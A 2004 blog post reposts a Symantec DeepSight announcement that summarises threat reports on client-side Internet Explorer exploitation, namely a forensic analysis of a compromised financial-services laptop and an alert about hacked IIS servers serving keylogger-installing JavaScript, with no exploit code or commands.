Saturday, June 26, 2004

VIRUS: Overview of Client-side Exploitation

DeepSight Threat Management System - :�Overview of Client-side Exploitation: "DeepSight Threat Management System Overview of Recent Targeted, and Wormed Client-side Exploitation

Client-side exploitation, while not new, has become a serious threat recently. Several known, but unpatched vulnerabilities in Internet Explorer are being actively exploited. The DeepSight Threat Analyst team has observed this high-profile exploitation by worms and by targeted attacks. We are releasing these documents, from DeepSight Threat Management System, to the public with the goal of bringing attention to these threats.

Client-side Exploits: Forensic Analysis of a Compromised Financial Services Laptop

This document details the forensic analysis of a machine compromised through the use of a client-side vulnerability. The evidence gathered in this analysis strongly suggests that this client-side attack was used to specifically target a financial institution, with the goal of retrieving the necessary authentication credentials to escalate the initial attack to further compromise other related systems. The analysis of this compromise provides us with a real-world example of targeted attacks against a specific company, in this case, a company in the Financial Services sector using a client-side attack vector. Although not new, the targeted exploitation of client-side vulnerabilities has not seen extensive documentation or analysis. This analysis aims to provide the reader with a detailed description of an actual attack exploiting a client-side vulnerability.

Compromised IIS Server / Unpatched Internet Explorer Vulnerability Exploitation Alert

The DeepSight Threat Analyst Team has become aware of various public reports of Microsoft Internet Information Services (IIS) servers being attacked and subsequently compromised. As a second component of the compromise, a malicious JavaScript is hosted on the infected IIS system and inserted into files served from that system. This document contains information about the vulnerabilities used and the subsequently deployed malcode, which is not available elsewhere. The malicious JavaScript in question is designed to compromise client systems through multiple known, but unpatched vulnerabilities in Internet Explorer. The resulting client-side infection includes, among other things, a keystroke logger. The Threat Analyst Team has manually captured a sample of the IE exploit, and resulting binary, in the DeepSight Honeynet system. Further investigation of the exploit resulted in the conclusions described below. UPDATE: This Threat Alert has been updated to include additional information about the client side exploits used in this attack. Additional information about other associated files has also been added.


Post a Comment

<< Home

Get Firefox!